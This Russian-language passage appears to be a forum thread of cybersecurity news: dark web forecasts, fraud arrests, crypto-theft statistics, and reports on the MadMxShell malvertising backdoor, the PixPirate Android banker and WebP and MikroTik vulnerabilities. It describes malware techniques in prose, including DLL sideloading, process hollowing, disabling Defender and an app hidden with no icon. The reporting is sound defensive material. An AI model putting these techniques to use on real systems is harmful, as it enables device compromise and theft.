связанной с дрейнерами.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13211108/KSB_dark_web_predictions_03.png)
Публикация в даркнете, направляющая потенциальных сообщников в Telegram
Разработчики дрейнеров все больше внимания уделяют работе с долгосрочными
клиентами, при этом основная часть деятельности ведется через каналы,
доступные только по приглашению.
С функциональной точки зрения дрейнеры претерпели мало изменений,
преимущественно добавлялась поддержка новых видов криптоактивов — монет,
токенов и NFT. Кроме того, в 2024 году появился первый [мобильный
дрейнер](https://research.checkpoint.com/2024/wallet-scam-a-case-study-in-
crypto-drainer-tactics/).
Вердикт: прогноз
сбылся
Схемы генерации черного трафика на подпольных рынках сохраняли свою популярность в 2024 году. Торговцы черным трафиком продолжали продвигать вредоносные страницы через рекламу, вводящую пользователей в заблуждение. Подобные услуги активно продавались на подпольных рынках, а стабильный спрос подчеркивал эффективность распространения вредоносного ПО через популярные рекламные платформы. Этот метод остается предпочтительным способом охвата широкой аудитории злоумышленниками и представляет собой постоянную угрозу для пользователей интернета.
Вердикт: прогноз сбылся частично
эволюционирует
В 2024 году количество сервисов, рекламирующих решения для «отмывания» криптовалюты, не показало существенного роста. Большинство популярных сервисов продолжают работать на рынке, при этом конкурентная среда изменилась лишь незначительно.
Вердикт: прогноз не сбылся
В атаках через доверительные отношения (trusted relationship) между компанией и подрядчиком злоумышленники сначала проникают в системы поставщика, а затем получают доступ к инфраструктуре целевой организации или к ее данным. Иногда такие атаки приводят к серьезным утечкам данных, как это было в [случае](https://www.wired.com/story/epam-snowflake-ticketmaster-breach- shinyhunters/) с Ticketmaster. Тогда злоумышленники, предположительно, получили доступ к их облачной учетной записи в Snowflake, взломав системы стороннего подрядчика. Злоумышленник IntelBroker также использовал схожую тактику. Вместе со своими сообщниками он, как сообщается, получил доступ через подрядчиков к данным таких компаний, как [Nokia](https://hackread.com/hackers- claim-access-nokia-internal-data-selling-20k/), Ford, а также [нескольких клиентов Cisco, включая Microsoft](https://www.csoonline.com/article/3564374/alleged-cisco-data- breach-could-affect-microsoft-barclays-and-sap-developer-data.html).
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212244/KSB_dark_web_predictions_04-1.png)
Профиль IntelBroker на популярном форуме даркнета
Мы ожидаем, что атаки через подрядчиков, приводящие к утечке данных, будут
происходить чаще в 2025 году. Облачные платформы и IT-сервисы часто хранят
данные нескольких организаций, поэтому взлом одной компании может угрожать
безопасности многих других. Важно отметить, что утечка не обязательно должна
касаться критически важных активов, чтобы иметь разрушительные последствия. Не
каждое сообщение об утечке данных в даркнете связано с серьезным инцидентом.
Информация о продающихся базах данных может быть недостоверной. Например,
злоумышленники могут выдавать компиляции общедоступной или ранее утекшей
информации за свежие утечки. Кроме того, они могут рекламировать сомнительные
данные из неизвестного источника как базу данных известного бренда. Создавая
ажиотаж вокруг старых, неактуальных или даже не существующих в
действительности данных, злоумышленники могут вызвать общественный резонанс,
посеять панику и навредить репутации как поставщиков, так и их клиентов.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212315/KSB_dark_web_predictions_05.png)
Сообщение IntelBroker в даркнете о якобы утечке данных Tesla, которое позже
было [отредактировано](https://www.cyberdaily.au/security/11395-tesla-data-
breach-falsely-claimed-by-intelbroker-third-party-ev-charging-firm-actually-
breached) и теперь утверждает, что утечка относится к сторонней компании,
предоставляющей услуги зарядки электромобилей
В целом наблюдается рост числа объявлений о распространении корпоративных баз
данных в даркнете. Например, на одном из популярных форумов количество постов
за август–ноябрь 2024 года выросло на 40% по сравнению с тем же периодом
прошлого года.
Количество сообщений в даркнете о распространении баз данных; один из
популярных форумов, август 2023 г. — ноябрь 2024 г.
([скачать](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13213058/02-ru-dark-web-diagrams.png))
Этот рост частично можно объяснить повторной публикацией или объединением
старых утечек, но злоумышленники явно заинтересованы в распространении утекших
данных — как новых, так и старых, а иногда и поддельных. В 2025 году,
вероятно, мы увидим не только рост числа взломов и утечек данных через
подрядчиков, но и общее увеличение количества утечек.
Несмотря на всплеск активности
злоумышленников в Telegram в 2024 году, мы ожидаем, что они постепенно
вернутся на форумы даркнета. Администраторы теневых Telegram-каналов все чаще
сообщают, что их блокируют.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212432/KSB_dark_web_predictions_06.png)
Примеры сообщений от злоумышленников, объявляющих о блокировании их каналов
и учетных записей в Telegram
Ожидается, что возвращение или приток злоумышленников на форумы даркнета
усилит конкуренцию между площадками. Чтобы привлечь новую аудиторию, владельцы
форумов, вероятно, будут вводить новые функции и улучшать условия для торговли
данными. Например, они могут предлагать автоматизированные гарант-сервисы,
упрощенное разрешение споров и усиление мер безопасности и анонимности.
группировок
2024 год стал ключевым в мировой борьбе с киберпреступностью. Мы стали свидетелями множества успешных операций международных оперативных групп, таких как [Cronos](https://www.europol.europa.eu/media-press/newsroom/news/law- enforcement-disrupt-worlds-biggest-ransomware-operation) против LockBit, [Magnus](https://thehackernews.com/2024/10/dutch-police-disrupt-major- info.html) против стилеров RedLine и MetaStealer, а также Endgame против TrickBot, IcedID и SmokeLoader. В числе прочего можно выделить захват хакерского форума BreachForums и арест администраторов WWH-Club. Эксперты «Лаборатории Касперского» также активно помогали правоохранительным органам в борьбе с киберпреступностью. Например, поддержали координируемые Интерполом действия по устранению вредоносного ПО [Grandoreiro](https://www.kaspersky.com/about/press-releases/kaspersky- supports-interpol-coordinated-action-to-disrupt-grandoreiro-malware- operation), участвовали в обеспечении кибербезопасности во время [Олимпийских игр 2024 года](https://www.kaspersky.com/about/press-releases/kaspersky-joins- efforts-with-interpol-to-counter-cybercrime-during-the-2024-olympics) и внесли вклад в операцию [Synergia II](https://www.kaspersky.com/about/press- releases/kaspersky-supports-interpols-synergia-ii-operation-resulting-in-the- arrest-of-over-40-individuals), нацеленную на борьбу с фишингом, шифровальщиками и стилерами. Кроме того, мы участвовали в [совместной операции Интерпола и Африпола](https://www.kaspersky.com/about/press- releases/kaspersky-contributes-to-joint-interpol-afripol-operation-combating- cybercrime-across-africa) против киберпреступности в Африке. Эти и другие события стали примерами эффективного сотрудничества между правоохранительными органами и организациями по кибербезопасности.
Мы ожидаем, что в 2025 году увеличится число публичных арестов и мероприятий по ликвидации инфраструктуры злоумышленников и теневых форумов. В то же время в ответ на успешные операции 2024 года злоумышленники, вероятно, изменят тактику и начнут уходить в более глубокие и анонимные уголки даркнета. Мы также ожидаем рост популярности закрытых форумов и моделей доступа по приглашению.
в даркнете
Криптовалюты уже много лет остаются одной из главных целей злоумышленников. Под разными предлогами они заманивают владельцев криптовалюты на [мошеннические сайты](https://securelist.ru/hot-and-cold-cryptowallet- phishing/) и в [Telegram-боты](https://www.kaspersky.ru/blog/toncoin- cryptocurrency-scam/), а также внедряют функциональность кражи криптовалюты в инфостилеры и [банковские троянцы](https://securelist.com/grandoreiro-banking- trojan/114257/). Поскольку курс биткойна [продолжает](https://www.reuters.com/technology/bitcoin-record-highs-sets- sights-100000-2024-11-22/) устанавливать [рекорды](https://www.reuters.com/technology/bitcoin-breaches-94000-first- time-2024-11-20/), популярность дрейнеров, предназначенных для кражи токенов из криптовалютных кошельков, скорее всего, останется высокой и в следующем году.
Интерес к криптовалютам затронет и инфостилеры — вредоносные программы, крадущие конфиденциальную информацию с устройств пользователей, включая закрытые ключи криптовалютных кошельков, пароли, файлы cookie и данные форм автозаполнения. В последние годы мы [наблюдаем](https://www.kaspersky.com/about/press-releases/data-stealing- malware-infections-increased-sevenfold-since-2020-kaspersky-experts-say) резкий рост утечек учетных данных посредством этого вредоносного ПО и ожидаем, что эта тенденция сохранится и, возможно, усилится. Скорее всего, мы увидим появление новых семейств стилеров наряду с ростом активности уже существующих.
И стилеры, и дрейнеры, вероятно, будут все чаще предлагаться в даркнете в качестве услуг. [Вредоносное ПО как услуга](https://securelist.ru/malware-as- a-service-market/107565/) (MaaS) или подписка — это бизнес-модель в даркнете, позволяющая арендовать программы для проведения кибератак. Обычно клиентам таких сервисов предоставляются личный кабинет для управления атакой и техническая поддержка. Таким образом снижается уровень технических знаний, которым должен обладать потенциальный злоумышленник.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212543/KSB_dark_web_predictions_07.png)
Пример стилера, предлагаемого по модели MaaS
Помимо рекламы стилеров и дрейнеров, в даркнете также можно встретить
объявления о поиске трафферов — людей, которые помогают злоумышленникам
распространять и продвигать стилеры, дрейнеры, мошеннические и фишинговые
страницы.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212616/KSB_dark_web_predictions_08.png)
Примеры поиска трафферов для дрейнеров
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212649/KSB_dark_web_predictions_09.png)
Пример поиска трафферов для мошенничества с криптовалютой (не дрейнера)
Мы ожидаем, что в следующем году группы операторов шифровальщиков продолжат разделяться на более мелкие независимые команды, что усложнит их отслеживание, повысит их уровень гибкости и скрытности. Согласно данным Kaspersky Digital Footprint Intelligence (DFI), в 2024 году количество сайтов с эксфильтрованными данными (DLS) увеличилось в 1,5 раза по сравнению с 2023 годом. Несмотря на этот рост, среднее количество уникальных постов в месяц осталось на уровне [прошлого года](https://securelist.ru/darknet-predictions- for-2024/).
Операторы шифровальщиков, вероятно, продолжат [использовать](https://securelist.ru/key-group-ransomware-samples-and- telegram-schemes/) [утекшие](https://securelist.com/lockbit-ransomware- builder-analysis/110370/) исходные коды и сборщики вредоносных программ для создания собственных версий. Такой подход значительно снижает входной барьер для новых групп, позволяя им избежать разработки инструментов с нуля. То же касается DLS-порталов: малоквалифицированные злоумышленники могут использовать утекший исходный код блогов известных группировок для создания почти точных копий, что уже сейчас можно наблюдать в даркнете.
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212731/KSB_dark_web_predictions_10.png)
DLS-портал LockBit
[](https://media.kasperskycontenthub.com/wp-
content/uploads/sites/58/2024/12/13212804/KSB_dark_web_predictions_11.png)
DLS-портал DarkVault — практически точная копия портала LockBit
6. Эскалация киберугроз на Ближнем Востоке: расцвет хактивизма и вымогательства
По данным Kaspersky Digital Footprint Intelligence (DFI), в первой половине 2024 года деятельность хактивистов стала одной из самых значимых угроз кибербезопасности, связанных с даркнетом, на Ближнем Востоке. В регионе наблюдается рост хактивистской активности из-за текущей геополитической ситуации, и, если напряженность не уменьшится, вероятно, ситуация будет ухудшаться.
Исследователи Kaspersky DFI зафиксировали более 11 хактивистских движений и групп по всему региону. На фоне текущей геополитической нестабильности хактивисты переходят от DDoS-атак и дефейса веб-сайтов к более серьезным атакам, направленных на кражу данных и компрометацию организаций.
Еще одной угрозой, которая, вероятно, останется актуальной в регионе, являются шифровальщики. За последние два года на Ближнем Востоке значительно увеличилось число жертв атак шифровальщиков — с 28 в среднем за полугодие в 2022–2023 годах до 45 в первой половине 2024 года, согласно данным DLS- порталов. Вероятно, эта тенденция сохранится и в 2025 году.
Сараево, 13 декабря 2024 г. — Правоохранительные органы со всей Европы объединились для проведения Совместного дня действий EMPACT в Юго-Восточной Европе (JAD SEE) 2024, осуществив скоординированную кампанию против крупных преступных угроз в регионе. Операция, проводимая из нового координационного центра в Сараево, объединила представителей 26 стран для борьбы с такими ключевыми направлениями, как торговля людьми, миграционная контрабанда, торговля наркотиками и незаконным оружием, а также разрушение высокоорганизованных преступных сетей.
В ходе масштабной операции было задействовано 31 109 офицеров, которые провели внушительные 655 914 проверок различных объектов, включая 516 153 человек, 152 284 транспортных средства, 4 985 почтовых отправлений и 1 181 помещение. Эти усилия привели к задержанию 796 человек, началу 316 новых расследований и изъятию 442 единиц оружия.
Особенностью JAD SEE 2024 стал комплексный подход, охватывающий как физические проверки, так и киберпатрулирование в открытом интернете, даркнете и на платформах социальных сетей. Эта многоаспектная стратегия была усилена участием прокуроров из различных юрисдикций, что значительно повысило эффективность операции.
Ключевые результаты JAD SEE 2024:
Успех JAD SEE 2024 во многом обусловлен прочным трансграничным сотрудничеством. Партнёры из стран Западных Балкан, стран Восточного Партнёрства, таких как Молдова и Украина, а также поддержка Турции сыграли ключевую роль. Объединённые усилия агентств ЕС и не-ЕС, поддержанные такими инициативами, как проект EU4FAST и участие Интерпола, обеспечили бесперебойную и эффективную работу.
Europol внес значительный вклад, направив экспертов с мобильными офисами, что позволило в реальном времени сверять новую информацию с обширными базами данных агентства. Кроме того, специализированные подразделения — включая кинологические отряды, экспертов по обнаружению методов сокрытия и специалистов по мошенничеству с документами — предоставили критическую поддержку как физическим, так и виртуальным аспектам операции.
Проект EU4FAST поддержал создание координационного центра и участие стран Западных Балкан, Молдовы, Украины, Турции и отдельных государств-членов ЕС, а также Интерпола в операционный фазе.
EMPACT как платформа для сотрудничества
JAD SEE 2024 информирован и направлен Европейской многодисциплинарной платформой против преступных угроз (EMPACT), инициативой безопасности ЕС, направленной на борьбу с серьёзной и организованной преступностью на глобальном уровне. Успех этой операции основан на действиях, основанных на разведке, и едином, совместном подходе, демонстрируя добавленную ценность коллективных усилий в борьбе с комплексной и серьёзной международной преступностью.
«Объединение сил против организованной преступности» , девиз JAD SEE 2024, отражает коллективную решимость и стратегическую координацию, которые сделали эту масштабную операцию успешной. По мере того как ЕС продолжает укреплять свои меры безопасности за пределами своих границ, такие инициативы, как JAD SEE 2024, устанавливают ориентир для будущих совместных усилий в борьбе с организованной преступностью.
В Ханты-Мансийском автономном округе сотрудники подразделения уголовного розыска Управления МВД России по г. Нижневартовску совместно с оперативниками РУ ФСБ России по Тюменской области в результате комплекса проведённых мероприятий вышли на след и задержали в Нижневартовске 30-летнего сообщника телефонных аферистов. По версии сыщиков, мужчина обеспечивал бесперебойную работу устройств, которые мошенники дистанционно использовали при звонках своим жертвам.
Так, в июне 2024 года злоумышленники в течении недели звонили пенсионеру из Башкирии, выманили у него данные для входа в личный кабинет на портале Госуслуг, а затем под предлогом сохранности сбережений уговорили его сходить в банк, чтобы снять сбережения в размере 600 тысяч рублей и перевести их на счёт, который назвали «безопасным». Однако к счастью для пожилого мужчины в тот день финансовая организация была закрыта. Узнав об этом, он решил попросить помощи в проведении денежной операции у сына, а после разговора с ним понял, что чуть не стал жертвой аферистов и обратился в полицию.
В ходе проведения обыска по месту проживания задержанного полицейские нашли и изъяли ту самую SIM-карту, с номера которой мошенники звонили жителю Башкирии. Там же в квартире были обнаружены и изъяты шесть SIM-боксов, 14 сотовых телефонов, ноутбук, четыре Wi-Fi роутера, USB-накопители, две камеры наружного наблюдения, три банковские карты и ещё 1325 SIM-карт десяти различных операторов сотовой связи.
Как выяснили оперативники, подозреваемый занимался тем, что поддерживал корректную работу изъятого оборудования и по указанию аферистов, с которыми общался через Интернет, в определённое время переставлял в нём нужные SIM- карты. За такую работу он получал денежное вознаграждение. Устройства же мужчина получил от нанимателей через транспортную компанию в пункте выдачи заказов.
В настоящее время в отношении жителя Нижневартовска следователем УМВД России по г. Нижневартовску возбуждены уголовные дела по признакам преступлений, предусмотренного ч. 3 ст. 30, ч. 3 ст. 159 и ч. 3 ст. 272 Уголовного кодекса Российской Федерации. Фигуранту избрана мера пресечения в виде заключения под стражу.
Сейчас в ходе следствия предварительно установлено, что изъятые во время обыска номера телефонов имеют совпадения по более 40 уголовным делам о дистанционных мошенничествах, по которым потерпевшими признаны жители разных регионов России. Сыщики проводят дальнейшие мероприятия, направленные на установление, розыск и задержание соучастников задержанного, а также выявление дополнительных эпизодов его противоправной деятельности.
• Video: https://t.me/TauNewsEkb/23251
• Video: https://rutube.ru/video/6bb1817bf30b11b00c7276190dba0757/?r=plemwd
На Львовщине будут судить злоумышленника, который с помощью фишингового сайта одного из банков завладел деньгами клиента.
Как установили правоохранители, 27-летний житель города Трускавец создал в сети Интернет фишинговый сайт одного из крупных украинских банков, сделал рассылку и в дальнейшем, получив персональные данные и доступ к счетам одного из клиентов, завладел его средствами на общую сумму более 135 тысяч гривен.
Злоумышленника разоблачили оперативники Управления противодействия киберпреступлениям во Львовской области совместно со следователями отделения полиции № 2 Дрогобычского районного отдела полиции, под процессуальным руководством Дрогобычской окружной прокуратуры.
Досудебное расследование в уголовном производстве, открытом по ч.3 ст.190 (Мошенничество) Уголовного кодекса Украины, завершено. Обвинительный акт направлен на рассмотрение суда. Максимальное наказание, которое грозит обвиняемому - лишение свободы на срок до пяти лет.
facebook.com/MVS.LVIV/posts/pfbid0Hi6g5XrKKaJX8vPpwdYn2kemWSefkmRGHiqK3xYNvyaBH4bX5ZYYCkUTyWEjUtePl?rdid=0LImjXIUBCzjzw1Y
За квартал в SlowMist за помощью обратились жертвы 467 краж криптовалют.
Основными причинами инцидентов оказались утечки закрытых ключей, фишинг и мошенничество.
Во II квартале сервис MistTrack компании SlowMist получил 467 сообщений о кражах цифровых активов. Средства 18 жертв на сумму $22,66 млн удалось заморозить.
__https://twitter.com/x/status/1808240351695757618
Из общего количества обращений к специалистам китайской фирмы 321 поступило от пользователей из КНР, 146 — из-за рубежа. В SlowMist проанализировали эти инциденты, не включая в отчет сообщения, полученные по другим каналам.
В числе наиболее частых способов краж эксперты назвали утечки закрытых ключей, фишинг и мошенничество.
В SlowMist отметили, что пользователи нередко хранят ключи и мнемонические фразы в облачных сервисах вроде Google Docs или пересылают друзьям через мессенджеры для создания резервных копий. Однако такие действия повышают риск перехвата информации злоумышленниками.
Также зафиксированы случаи скама, когда жертву обманывали, выдавая себя за сотрудников службы поддержки, и просили поделиться данными.
«Поддельные кошельки — еще одна серьезная причина утечек закрытых ключей», — подчеркнули эксперты.
Это давно известный вектор атак, но он остается актуальным, признали они. Ряд пользователей предпочитает загружать приложения из сомнительных источников из- за сетевых ограничений для Google Play или по другим причинам.
Специалисты компании изучили реализацию в фейковых кошельках функций на уровне бэкенда, включая управление пользователями, активами и депозитами.
«Продвинутый характер и профессиональный уровень этих фишинговых действий намного превзошел наши ожидания», — признали они в итоге.
Фишинг и мошенничество также совершенствуется
В отношении фишинга анализ показал, что примерно 80% комментариев под постами популярных криптопроектов в X публикуют скамеры.
Эксперты обнаружили в Telegram многочисленные группы, продающие различные X-аккаунты с подписчиками, постами и разным временем регистрации. Это позволяет злоумышленникам подобрать предложение под свои потребности.
Доступные скамерам страницы нередко полностью копируют оформление оригиналов. Например, специалисты нашли аккаунт названием Optimlzm, который выглядел практически идентично реальному Optimism.
Используя эти свойства, а также инструменты продвижения (например, закрепление своих сообщений вверху ленты комментариев), мошенники успешно обманывают своих жертв, которые в итоге переходят по фишинговым ссылкам.
Пример доступного к покупке X–аккаунта на NFT-тематику с подписчиками и
лентой. Данные: SlowMist
Из разнообразных видов мошенничества во II квартале наиболее популярной оказалась схема honeypot. В кибербезопасности это виртуальная ловушка для заманивания злоумышленников, позволяющая изучить их методы и практики. В криптоиндустрии так называют метод привлечения инвесторов в бесполезные и неликвидные активы, которые потом невозможно реализовать.
Эксперты описали типичную схему скама:
1. Мошенник создает смарт-контракт и заманивает жертв обещаниями высокой прибыли, агрессивно склоняя к покупке.
2. После приобретения актива пользователь видит, что цена растет, и не торопится его продавать. Когда же он решается на это, то обнаруживает, что реализовать токены невозможно.
3. Скамер выводит средства жертв, которых удалось вовлечь.
В SlowMist подчеркнули, что honeypot зачастую не удается сразу распознать даже опытным инвесторам.
Новая вредоносная рекламная кампания в Google подкидывает пользователю бэкдор под названием MadMxShell, используя кластер доменов, имитирующих легитимные IP-сканеры.
Исследователи из Zscaler ThreatLabz [рассказывают](https://www.zscaler.com/blogs/security-research/malvertising- campaign-targeting-it-teams-madmxshell), что злоумышленники зарегистрировали несколько доменных имен, близких по написанию к адресам популярных сайтов, и c помощью Google Ads, по ключевым словам, вывели эти домены в топ результатов поисковой системы. Хакеры рассчитывали на невнимательность жертв.
Пользователям открываются фиктивные сайты, содержащие JavaScript-код, который загружает на устройство вредоносный файл «Advanced-ip-scanner.zip» при нажатии кнопки загрузки.
В ZIP-архиве присутствует библиотека «IVIEWERS.dll» и исполняемый файл «Advanced-ip-scanner.exe». Последний использует метод сторонней загрузки DLL для заражения.
DLL-файл отвечает за внедрение шелл-кода в процесс «Advanced-ip-scanner.exe» с помощью техники, называемой «Process Hollowing» (внедрение в пустой процесс), после чего вредоносный EXE-файл распаковывает два дополнительных файла – «OneDrive.exe» и «Secur32.dll».
«OneDrive.exe», легитимный подписанный двоичный файл Microsoft, затем используется для боковой загрузки «Secur32.dll» и в конечном счете для выполнения шелл-кода бэкдора, но не раньше, чем он будет сохранен на хосте с помощью запланированной задачи и отключения антивируса Microsoft Defender.
Бэкдор предназначен для сбора системной информации, запуска команд через cmd.exe и выполнения основных операций с файлами, таких как чтение, запись и удаление файлов.
Стало известно, что было зарегистрировано 45 доменов в период с ноября 2023-го по март 2024 года, которые маскировались под известные программы для сканирования портов и управления ИТ, такие как Advanced IP Scanner, Angry IP Scanner, IP-сканер PRTG и ManageEngine.
Хоть это уже не первый случай заражения устройств пользователей через фиктивные сайты с помощью вредоносной рекламы, данная разработка впервые распространяет сложный бэкдор для Windows.
Компания Zscaler заявила, что пока ничего не известно о злоумышленниках и их намерениях, но уже есть зацепки в виде учетных записей, созданных на криминальных подпольных форумах. Ещё в июне 2023 года хакеры предлагали способы создания неограниченных предварительно финансируемых Google аккаунтов, что указывает на их заинтересованность в создании и запуске их собственной длительной кампании вредоносной рекламы.
3333
Исследователи [обнаружили](https://securityintelligence.com/posts/pixpirate- brazilian-financial-malware/), что последняя версия банковского трояна PixPirate для Android использует новый метод, позволяющий малвари скрываться на устройствах пользователей и оставаться активной, даже если исходное приложение-дроппер было удалено.
Впервые PixPirate [был обнаружен](https://www.cleafy.com/cleafy- labs/pixpirate-a-new-brazilian-banking-trojan) специалистами Cleafy TIR в прошлом году, и тогда эксперты писали, что малварь в основном атакует пользователей из стран Латинской Америки. Хотя уже тогда в Cleafy отмечали, что вредонос запускается отдельным приложением-загрузчиком, в отчете экспертов не рассматривались необычные методы маскировки PixPirate, или же тогда малварь еще их не использовала.
В новом отчете IBM, посвященном этому вредоносу, рассказывается, что PixPirate не использует стандартную тактику, в рамках которой малварь старается скрыть свою иконку от пользователя (это работает в Android до версии 9). Вместо этого банкер вообще не использует иконку, что позволяет ему оставаться незамеченным даже на последних версиях Android (вплоть до 14-й).
Однако отказ от использования иконки создает очевидную проблему: жертва не может найти и запустить вредоносную программу.
Исследователи IBM объясняют, что новые версии PixPirate используют два разных
приложения, которые работают вместе. Первое приложение — это загрузчик, оно
распространяется через APK-файлы и фишинговые сообщения, отправляемые жертвам
через WhatsApp или SMS.

При установке загрузчик запрашивает у пользователя доступ к опасным разрешениям, включая Accessibility Services, а затем загружает и устанавливает второе приложение-дроппер (droppee), которое представляет собой зашифрованный банкер PixPirate.
В свою очередь, приложение droppee не декларирует в манифесте свою основную активность с параметрами android.intent.action.MAIN и android.intent.category.LAUNCHER, поэтому на главном экране устройства не появляется никакой иконки, а приложение становится практически невидимым.
Вместо этого дроппер использует сервис, к которому могут подключаться другие
приложения, и к которому подключается загрузчик, если хочет запустить
PixPirate. Помимо дроппера, который способен запускать и контролировать
малварь, триггерами могут стать загрузка устройства, изменение подключения или
другие системные события, за которыми следит PixPirate, работающий в фоновом
режиме.

«Droppee использует экспортируемый сервис com.companian.date.sepherd и содержит intent-фильтр с кастомным действием com.ticket.stage.Service. Когда загрузчик хочет запустить droppee, он создает и привязывает этот сервис с помощью API BindService с флагом BIN_AUTO_CREATE. После создания и привязки сервиса droppee APK запускается и начинает работать», — поясняют исследователи.
Click to expand...
Таким образом, даже если жертва удалит приложение-загрузчик со своего устройства, PixPirate продолжит скрываться от пользователя и продолжит запускаться в связи с различными событиями на устройстве.
Свое название PixPirate получил благодаря нацеленности на бразильскую платформу мгновенных платежей Pix. Так, создатели малвари стремятся перенаправить средства жертв себе, путем перехвата или инициирования мошеннических транзакций. По данным IBM, Pix очень популярна в Бразилии, где ее используют более 140 млн человек.
RAT-возможности, которыми обладает PixPirate, позволяют ему автоматизировать весь процесс мошенничества от перехвата учетных данных пользователя и кодов двухфакторной аутентификации, до выполнения несанкционированных транзакций Pix. Причем все это происходит фоновом режиме, без ведома пользователей, хотя и требует разрешения на использование Accessibility Service.
Кроме того, эксперты отмечают, что у малвари есть резервный механизм ручного управления на тот случай, если автоматизация не сработает.
В Одесской области полицейские разоблачили преступную группу псевдоволонтеров
Злоумышленники обещали доставить автомобиль военнослужащим, которого на самом
деле не было, и просили деньги на горючее. Таким образом, были обмануты 6
доверчивых граждан на общую сумму около 130 тыс. гривен.
Полицейские сообщили правонарушителям о подозрении в мошенничестве и отмывании
денег. За совершенное им грозит до восьми лет заключения.
Она была задержана, когда ее деятельность была раскрыта представителями полиции. Задержанная согласно официальной информации работала на анонимного интернет-пользователя, который предложил ей оказывать услуги по предоставлению своих картовых реквизитов в обмен на вознаграждение.
Он обещал заплатить ей 90 белорусских рублей (около 3500 руб) за эту работу. Однако, когда дело дошло до оплаты, мошенник поставил дополнительное условие - женщина должна была найти еще одного человека, чтобы оформить на свое имя несколько карт. Подозревая неладное, жительница Могилева отказалась от этого предложения. После этого, "работодатель" пропал, и она так и не получила вознаграждение.
За время, пока мошенники использовали ее данные карт, было использовано для незаконного перевода более 55 тысяч белорусских рублей (около 2 млн руб).
Разработчики Mozilla [выпустили](https://www.mozilla.org/en- US/security/advisories/mfsa2023-40/) экстренные обновления, чтобы исправить критическую уязвимость нулевого дня, которая уже использовалась хакерами и затрагивала браузер Firefox и почтовый клиент Thunderbird. Ту же проблему, связанную библиотекой WebP (libwebp), ранее исправили в своих продуктах специалисты Google.
Критический баг имеет идентификатор CVE-2023-4863 и связан с переполнением буфера хипа WebP. Известно, что последствия от эксплуатации этой уязвимости могут варьироваться от сбоев до удаленного выполнения произвольного кода.
«Открытие вредоносного изображения WebP может привести к переполнению буфера хипа в процессе обработки контента. Нам известно, что эта проблема уже эксплуатируется в других продуктах», — сообщают разработчики Mozilla в своем бюллетене безопасности.
Click to expand...
Mozilla устранила уязвимость в составе Firefox 117.0.1, Firefox ESR 115.2.1, Firefox ESR 102.15.1, а также в Thunderbird 102.15.1 и Thunderbird 115.2.2.
Опенсорсная библиотека libwebp, разработанная Google, обрабатывает изображения WebP. То есть любое приложение, которое использует упомянутую библиотеку для работы с изображениями WebP (будь то Chrome, Edge, Firefox и так далее), потенциально может быть атаковано чрез специально подготовленное изображение.
Напомним, что ранее эту уязвимость, связанную с WebP, исправили в браузере Google Chrome, а специалисты компании предупредили, что им известно о существовании эксплоита для CVE-2023-4863. При этом за обнаружение проблемы в компании поблагодарили коллег из Apple Security Engineering and Architecture (SEAR).
Также на прошлой неделе внеплановые обновления, устраняющие две 0-day уязвимости, которые уже использовались в атаках на пользователей iPhone и Mac, выпустила компания Apple. Ошибки и получили идентификаторы CVE-2023-41064 и CVE-2023-41061.
Сообщалось, что CVE-2023-41064 представляет собой уязвимость, связанную с переполнением буфера, срабатывает при обработке вредоносных изображений и может привести к выполнению произвольного кода на непропатченных устройствах.
Тогда специалисты Citizen Lab [писали](https://citizenlab.ca/2023/09/blastpass-nso-group-iphone-zero-click- zero-day-exploit-captured-in-the-wild/), что проблемы CVE-2023-41064 и CVE-2023-41061 активно применялись злоумышленниками и являлись частью цепочки zero-click эксплоитов для iMessage, которая получила название BLASTPASS. Эксперты считают, что эти уязвимости использовались для распространения шпионского ПО Pegasus, созданного NSO Group.
Хотя пока о прямой связи между CVE-2023-4863 и уязвимостями, исправленными Apple, не сообщалось, время выхода патчей, благодарность специалистам Apple SEAR и схожие типы уязвимостей намекают на то, что между этими проблемами может быть много общего.
Критическая уязвимость, допускающая повышение привилегий до уровня Super Admin, угрожает более чем 900 000 маршрутизаторам MikroTik с RouterOS на борту.
Проблема отслеживается под идентификатором CVE-2023-30799 и позволяет злоумышленникам, у которых уже есть учетная запись администратора, повысить свои привилегии до Super Admin через интерфейс Winbox или HTTP.
Специалисты компании [VulnCheck](https://vulncheck.com/blog/mikrotik-foisted- revisited) объясняют, что эта проблема не кажется серьезной лишь на первый взгляд. Ведь, казалось бы, если потенциальный атакующий должен заранее иметь привилегии администратора, все не так уж плохо. Но, к сожалению, это вряд ли остановит злоумышленников, так как RouterOS не предотвращает брутфорс-атаки, не предъявляет жестких требований к паролю администратора, а также по умолчанию имеет аккаунт admin, о котором известно очень давно.
Хуже того, до октября 2021 года пароль администратора по умолчанию был пустой строкой, и эту проблему исправили только с релизом RouterOS 6.49. По данным исследователей, около 60% устройств MikroTik все еще используют эту учетную запись, хотя производитель давно рекомендует ее удалить.
«Массовая эксплуатация [уязвимости] осложняется тем, что для атаки требуются действительные учетные данные. Однако маршрутизаторам не хватает базовой защиты от подбора пароля, — говорят эксперты VulnCheck. — Мы намеренно не публикуем PoC-эксплоит, но будь он доступен, то наверняка был бы использован [хакерами] на практике сразу после публикации нашей статьи».
Click to expand...
Уязвимость была обнаружена еще в июне 2022 года, и MikroTik исправила проблему в октябре 2022 года в стабильной версии RouterOS (6.49.7), а 19 июля 2023 года вышел патч для ветки Long-term (6.49.8). В VulnCheck отмечают, что свежие патчи появились лишь после того, как специалисты связались с разработчиками и поделились с ними новыми эксплоитами.
По статистике Shodan, перед CVE-2023-30799 уязвимы 474 000 устройств, поскольку их управляющая веб-страница доступна для удаленного доступа. Однако, поскольку уязвимость также может использоваться через Winbox (клиент для управления устройствами на базе Mikrotik RouterOS), количество уязвимых девайсов увеличивается почти вдвое и составляет уже 926 000 устройств.
[](https://xakep.ru/wp-
content/uploads/2023/07/430862/versions.jpg)Версии Router OS на устройствах,
обнаруженных через Shodan
Исследователи объясняют, что привилегии уровня Super Admin имеют ряд
преимуществ перед обычными привилегиями администратора. Фактически,
суперадминистратор получает полный и неограниченный доступ к операционной
